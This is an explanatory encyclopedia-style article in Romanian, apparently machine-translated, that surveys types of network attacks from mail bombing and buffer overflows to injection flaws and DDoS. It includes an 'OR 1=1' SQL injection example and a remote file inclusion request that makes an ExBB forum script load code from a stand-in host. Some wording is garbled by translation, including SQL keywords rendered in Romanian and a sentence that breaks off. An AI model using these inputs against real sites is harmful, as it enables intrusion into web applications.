Un atac de hacker în sensul restrâns al cuvântului - în prezent, expresia este înțeleasă ca un „Asalt asupra unui sistem de securitate” și tinde mai mult spre sensul următorului termen Cracker attack . Acest lucru s-a datorat unei denaturări a sensului cuvântului „ hacker ” în sine.
Un atac de hacker în sensul larg al cuvântului (sensul original) este o sesiune de brainstorming menită să găsească modalități de a rezolva probleme complexe. Unul sau mai mulți specialiști de înaltă clasă ( hackeri ) pot lua parte la un atac de hacker. Ca rezultat al brainstorming-ului, pot fi inventate metode neconvenționale pentru rezolvarea unei probleme sau pot fi făcute ajustări de optimizare la metodele existente.
Un atac de cracker este o acțiune care vizează preluarea controlului (creșterea drepturilor) asupra unui sistem de calcul la distanță/local, sau destabilizarea acestuia sau refuzul serviciului.
Este considerată cea mai veche metodă de atac, deși esența sa este simplă și primitivă: un număr mare de mesaje de e-mail fac imposibilă lucrul cu cutiile poștale și, uneori, cu servere de e-mail întregi . Multe programe au fost dezvoltate în acest scop și chiar și un utilizator fără experiență ar putea efectua un atac specificând doar e-mailul victimei , textul mesajului și numărul de mesaje necesare. Multe astfel de programe au făcut posibilă ascunderea adresei IP reale a expeditorului, folosind un server de e-mail anonim pentru e-mail . Acest atac este greu de prevenit, deoarece chiar și filtrele de e-mail ale ISP -ului nu pot determina expeditorul real de spam . Furnizorul poate limita numărul de e-mailuri de la un singur expeditor, dar adresa și subiectul expeditorului sunt adesea generate aleatoriu .
Poate unul dintre cele mai comune tipuri de atacuri pe Internet. Principiul acestui atac se bazează pe utilizarea erorilor software care permit provocarea unei încălcări a memoriei și blocarea aplicației sau executarea unui cod binar arbitrar în numele utilizatorului sub care rula programul vulnerabil. Dacă programul rulează sub contul de administrator de sistem, atunci acest atac vă va permite să obțineți controlul deplin asupra computerului victimei, deci este recomandat să lucrați sub contul unui utilizator obișnuit cu drepturi limitate pe sistem și să efectuați numai operațiuni care necesită drepturi administrative în contul de administrator de sistem.
Următorul tip de atac este o metodă mai sofisticată de a obține acces la informații clasificate - utilizarea de programe speciale pentru a lucra pe computerul victimei, precum și distribuția ulterioară (aceștia sunt viruși și viermi). Astfel de programe sunt concepute pentru a căuta și a transfera informații secrete proprietarului lor sau pur și simplu pentru a dăuna sistemului de securitate și performanței computerului victimei. Principiile de funcționare ale acestor programe sunt diferite.
În timpul unui astfel de atac, crackerul nu efectuează de fapt nicio acțiune distructivă, dar, ca urmare, poate obține informații confidențiale despre construcția și principiile de funcționare ale sistemului de calcul al victimei. Informațiile obținute pot fi folosite pentru a construi în mod competent atacul viitor și se face de obicei în etapele pregătitoare.
În cursul unei astfel de recunoașteri, un atacator poate efectua scanări de porturi , interogări DNS , ping porturi deschise, prezența și securitatea serverelor proxy . Ca urmare, puteți obține informații despre adresele DNS existente în sistem, cine le deține, ce servicii sunt disponibile pe acestea, nivelul de acces la aceste servicii pentru utilizatorii externi și interni.
Este, de asemenea, un tip de atac destul de comun bazat pe funcționarea unei plăci de rețea în modul promiscuu , precum și pe modul monitor pentru rețelele Wi-Fi . În acest mod, toate pachetele primite de placa de rețea sunt trimise pentru procesare către o aplicație specială numită sniffer . Ca urmare, un atacator poate obține o cantitate mare de informații de serviciu: cine, de unde și unde au transmis pachetele, prin care adrese au trecut aceste pachete. Cel mai mare pericol al unui astfel de atac este obținerea informațiilor în sine, cum ar fi login-urile și parolele angajaților, care pot fi folosite pentru a intra ilegal în sistem sub masca unui angajat obișnuit al companiei.
De asemenea, un tip obișnuit de atac în rețelele insuficient protejate, atunci când un atacator se preface a fi un utilizator autorizat, aflându-se în cadrul organizației propriu-zise sau în afara acesteia. Pentru a face acest lucru, crackerul trebuie să folosească o adresă IP care este permisă în sistemul de securitate al rețelei. Un astfel de atac este posibil dacă sistemul de securitate permite identificarea utilizatorului doar prin adresa IP și nu necesită confirmări suplimentare.
Un tip de atac când un atacator interceptează canalul de comunicație între două sisteme și obține acces la toate informațiile transmise. La obținerea accesului la acest nivel, un atacator poate modifica informațiile în modul de care are nevoie pentru a-și atinge obiectivele. Scopul unui astfel de atac este obținerea, furtul sau falsificarea ilegală a informațiilor transmise sau obținerea accesului neautorizat la resursele rețelei. Astfel de atacuri sunt extrem de greu de urmărit, deoarece atacatorul se află de obicei în interiorul organizației.
O familie de atacuri unite de un principiu comun - ca urmare a atacului, datele sunt executate ca cod.
Injecția SQL este un atac în care parametrii interogărilor SQL către baza de date sunt modificați. Ca urmare, cererea capătă o cu totul altă semnificație, iar în caz de filtrare insuficientă a datelor de intrare, poate nu doar afișa informații confidențiale, ci și modifica/șterge datele. Foarte des, acest tip de atac poate fi observat pe exemplul site-urilor care folosesc parametrii de linie de comandă (în acest caz, variabile URL ) pentru a construi interogări SQL către bazele de date fără validarea corespunzătoare [1] .
SELECTează lista de câmpuri DIN tabelul WHERE id = 23 SAU 1=1;În loc să verificați, puteți înlocui o declarațieInjecția PHP este una dintre modalitățile de a pirata site-urile care rulează pe PHP . Constă în injectarea unui script rău intenționat special conceput în codul aplicației web de pe partea de server a site-ului, ceea ce duce la executarea de comenzi arbitrare. Se știe că multe motoare și forumuri gratuite care rulează pe PHP și care sunt răspândite pe internet (cel mai adesea acestea sunt versiuni învechite) au module prost concepute sau structuri separate cu vulnerabilități. Crackerii analizează astfel de vulnerabilități ca variabile neescape care primesc valori externe. De exemplu, vechea vulnerabilitate a forumului ExBB este exploatată de hackeri cu cererea: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.
Cross Site Scripting sau XSS ( abreviat din engleză Cross Site Scripting , a nu fi confundat cu CSS ( Cascade Style Sheet )) este un tip de vulnerabilități întâlnite frecvent în aplicațiile web care permit utilizatorilor rău intenționați să injecteze cod în paginile web vizualizate de alți utilizatori. . Exemple de astfel de coduri sunt codul HTML și scripturile client, cel mai frecvent JavaScript .
Injectarea XPath este un tip de vulnerabilitate care implică injectarea expresiilor XPath în cererea originală către o bază de date XML . Ca și în cazul altor tipuri de injecție, vulnerabilitatea este posibilă din cauza validării insuficiente a datelor de intrare.
Autofill este o injecție web care funcționează pe principiul troienilor, al cărei scop principal este de a infiltra contul utilizatorului în sistemul de plată , de a schimba imperceptibil datele tranzacției prin modificarea codului HTML și de a transfera fondurile utilizatorului în contul atacatorului.
Inginerie socială (din engleză inginerie socială ) - utilizarea incompetenței, incompetenței sau neglijenței personalului pentru a obține acces la informații. Această metodă se aplică de obicei fără computer, folosind un telefon obișnuit sau o poștă. În acest fel, se obține de obicei o mare varietate de informații. În cursul unui astfel de atac, atacatorul stabilește contactul cu victima și, inducând în eroare sau câștigând încredere, încearcă să obțină informațiile necesare care sunt greu de obținut în alt mod, sau alte moduri sunt mai riscante.
DoS (din engleză. Denial of Service - Denial of Service) - un atac care urmărește să facă serverul să nu răspundă la solicitări. Acest tip de atac nu presupune obținerea unor informații secrete, dar uneori este un ajutor în inițializarea altor atacuri. De exemplu, unele programe, din cauza erorilor din codul lor, pot provoca excepții și, atunci când serviciile sunt dezactivate, pot executa cod furnizat de un atacator sau pot inunda atacuri atunci când serverul nu poate procesa un număr mare de pachete primite.
DDoS (din limba engleză Distributed Denial of Service - Distributed DoS) este un subtip de atac DoS care are același scop ca și DoS, dar nu este realizat de pe un singur computer, ci de pe mai multe computere din rețea. Aceste tipuri de atacuri folosesc fie apariția erorilor care duc la refuzarea serviciului, fie operarea protecției, ducând la blocarea funcționării serviciului și, ca urmare, și la o refuzare a serviciului. DDoS este utilizat acolo unde DoS obișnuit este ineficient. Pentru a face acest lucru, mai multe computere sunt combinate și fiecare efectuează un atac DoS asupra sistemului victimei. Împreună, acest lucru se numește atac DDoS. Dimensiunea unei rețele bot poate varia de la câteva zeci la câteva sute de mii de computere.
Orice atac nu este altceva decât o încercare de a folosi imperfecțiunea sistemului de securitate al victimei fie pentru a obține informații, fie pentru a dăuna sistemului, de aceea motivul oricărui atac de succes este profesionalismul crackerului și valoarea informațiilor, precum și lipsa de competență a administratorului sistemului de securitate , în special, imperfecțiunea software -ului și atenția insuficientă la problemele de securitate în cadrul companiei în ansamblu.